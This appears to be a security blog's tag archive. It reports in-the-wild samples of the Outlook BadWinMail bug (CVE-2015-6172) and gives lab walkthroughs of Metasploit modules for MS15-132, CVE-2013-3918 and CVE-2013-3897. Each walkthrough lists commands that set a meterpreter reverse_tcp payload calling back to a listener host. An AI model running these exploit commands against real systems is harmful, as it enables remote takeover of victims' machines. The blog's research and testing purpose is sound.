Tag Archives: Microsoft

CVE-2015-6172 BadWinmail found exploited in the wild

Conclusion: It seem that AV vendors did a big mistake and blocked thousands of legit emails and by consequence also disclosed the content of certain of these emails on Internet, like DRP plan of banks…
All detected samples have now reduced they’re detection rate to only marginal anti-viruses. But clearly F-Secure and BitDefender were detecting and blocking thousands of emails during the last days. For the moment, we have no explanation from the anti-virus vendors.
I would like to thanks @_clem1, @Kafeine and @PhysicalDrive0 for they’re support in these clarifications.

 

On December 8th 2015, Microsoft released, during his regular Patch Tuesday, two updated security advisory, one new security advisory and twelve security bulletins. On the twelve security bulletins, MS15-131 concerned Microsoft Office and fixed 6 privately reported vulnerabilities.

One of the 6 vulnerabilities fixed in MS15-131, CVE-2015-6172 vulnerability raised particular attention of the security community. This vulnerability, named Outlook “letterbomb” or “BadWinMail“, would allow an attacker to sneak past Outlook’s security features. The vulnerability affects Office 2010 and later, as well as Microsoft Word 2007 with Service Pack 3.

This vulnerability has been discovered and privately reported to Microsoft by Haifei Li of Intel Security IPS Research Team. The security researcher published a paper describing the vulnerability accompanied by a demonstration video.

Unfortunately it seem that this vulnerability is actually exploited and was exploited before the release of Microsoft security patch.

Two files “FW Joseph J. Durczynski.rtf” (957a8d9d6bf7a0e54ad7eb350c930232) and “FW Philip Services Corp. et al..rtf” (20e184a415cd71eee1cea83df262f814) were submitted to VirusTotal the 27 December and detected as exploit of CVE-2015-6172.

FW Philip Services Corp. et al..rtf” file seems to be related to PSC Industrial Services. PSC claim to be the leading provider of specialty maintenance services and technology solutions to the critical energy infrastructure in the United States.

FW Joseph J. Durczynski.rtf” file seems to be related to Systech Environmental Corp and to particularly a certain Joe Durczynski working for Systech Environmental Corp.

By doing additional researches I found a third sample “_WRF_0CE7DC0E-AB99-4196-8DC2-F818ABF7C29A_.tmp” (52c4096e99126851736715c34b1f50a5) submitted on malwr the 23 December. This sample was also submitted on VirusTotal the 23 December and also recognised as exploit of CVE-2015-6172.

One additional file “FW RFQ.rtf” (fab9cfbc629fb3c3eb541fdaf8169ee1), reported to me by @PhysicalDrive0, targeting PGM Corp. PGM is a full service precision manufacturing corporation specialising in precision CNC machining, turning, grinding and assembly.

7328bf73af839bfc05e5cae177d60ca06cddc52beeee51fb2268f9a8b98d24fa

Interesting informations are the strings in the static analysis of the 23th December malwr sample.

Subject of the email was “FW: Disaster Recovery – home binder” and this email is an internal mail exchange of Safe Credit Union organisation. Also the mail containing the malware was sent the Tuesday, 8th September 2015.

It seem to be quiet urgent to patch if you didn’t already did it, but that seem to be more and more sure is that CVE-2015-6172 was used in the wild before the release of the Microsoft December patch.

Additional samples are actually submitted:

MS15-132 Office OLE multiple DLL side loading vulnerabilities

Timeline :

Vulnerabilities discovered and reported to the vendor by multiple security researchers
Patched by the vendor via MS15-132 the 2015-12-06
Metasploit PoC provided the 2015–12-25 by Securify

PoC provided by :

Yorick Koster

Reference(s) :

CVE-2015-6128
CVE-2015-6132
CVE-2015-6133
MS15-132

Affected version(s) :

CVE-2015-6128 affects Windows Visa, Server 2008, Windows 7, Server 2008 R2
CVE-2015-6132 affects Windows Visa, Server 2008, Windows 7, Server 2008 R2, 8 and 8.1, 2012 and 2012 R2, RT and RT 8.1, 10
CVE-2015-6133 affects Windows 8 and 8.1, 2012 and 2012 R2, RT and RT 8.1, 10

Tested on :

with Microsoft Office 2013 SP1 on Windows 7 SP1

Description :

Multiple DLL side loading vulnerabilities were found in various COM components. These issues can be exploited by loading various these components as an embedded OLE object. When instantiating a vulnerable object Windows will try to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory also containing the attacker’s DLL file, it is possible to execute arbitrary code with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.

Commands :

use exploit/windows/fileformat/ms15_132_dll_sideload
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

Share the output in a remote share folder

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

getuid
sysinfo

CVE-2013-3918 CardSpaceClaimCollection ActiveX Integer Underflow

Timeline :

Vulnerability discovered exploited in the wild
Patched by the vendor via MS13-090 the 2013-11-12
Metasploit PoC provided the 2013-11-15

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2013-3918
BID-63631
MS13-090

Affected version(s) :

Windows XP SP3, Windows Vista SP2, Windows 7 SP1, Windows 8 and 8.1

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a vulnerability on the CardSpaceClaimCollection class from the icardie.dll ActiveX control. The vulnerability exists while the handling of the CardSpaceClaimCollection object. CardSpaceClaimCollections stores a collection of elements on a SafeArray and keeps a size field, counting the number of elements on the collection. By calling the remove() method on an empty CardSpaceClaimCollection it is possible to underflow the length field, storing a negative integer. Later, a call to the add() method will use the corrupted length field to compute the address where write into the SafeArray data, allowing to corrupt memory with a pointer to controlled contents. This module achieves code execution by using VBScript as discovered in the wild on November 2013 to (1) create an array of html OBJECT elements, (2) create holes, (3) create a CardSpaceClaimCollection whose SafeArray data will reuse one of the holes, (4) corrupt one of the legit OBJECT elements with the described integer overflow and (5) achieve code execution by forcing the use of the corrupted OBJECT.

Commands :

use exploit/windows/browser/ms13_090_cardspacesigninhelper
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo

CVE-2013-3897 Microsoft Internet Explorer CDisplayPointer Use-After-Free

Timeline :

Vulnerability discovered exploited in the wild the 2013-09
Patched by the vendor via MS13-080 the 2013-10-08
Metasploit PoC provided the 2013-10-12

PoC provided by :

Unknown
sinn3r

Reference(s) :

CVE-2013-3897
MS13-080

Affected version(s) :

Internet Explorer 6, 7, 8, 9, 10 and 11.

Tested on :

with Internet Explorer 8 on Windows XP SP3

Description :

This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a “onpropertychange” event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called “onselect”. The “onselect” event will allow us to set up for the actual event handler we want to abuse – the “onpropertychange” event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in “onselect”, this will trigger “onpropertychange”. During “onpropertychange” event handling, a free of the CDisplayPointer object can be forced by using an “Unslect” (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer’s position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.

Commands :

use exploit/windows/browser/ms13_080_cdisplaypointer
set RHOST 192.168.6.143
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
exploit

getuid
sysinfo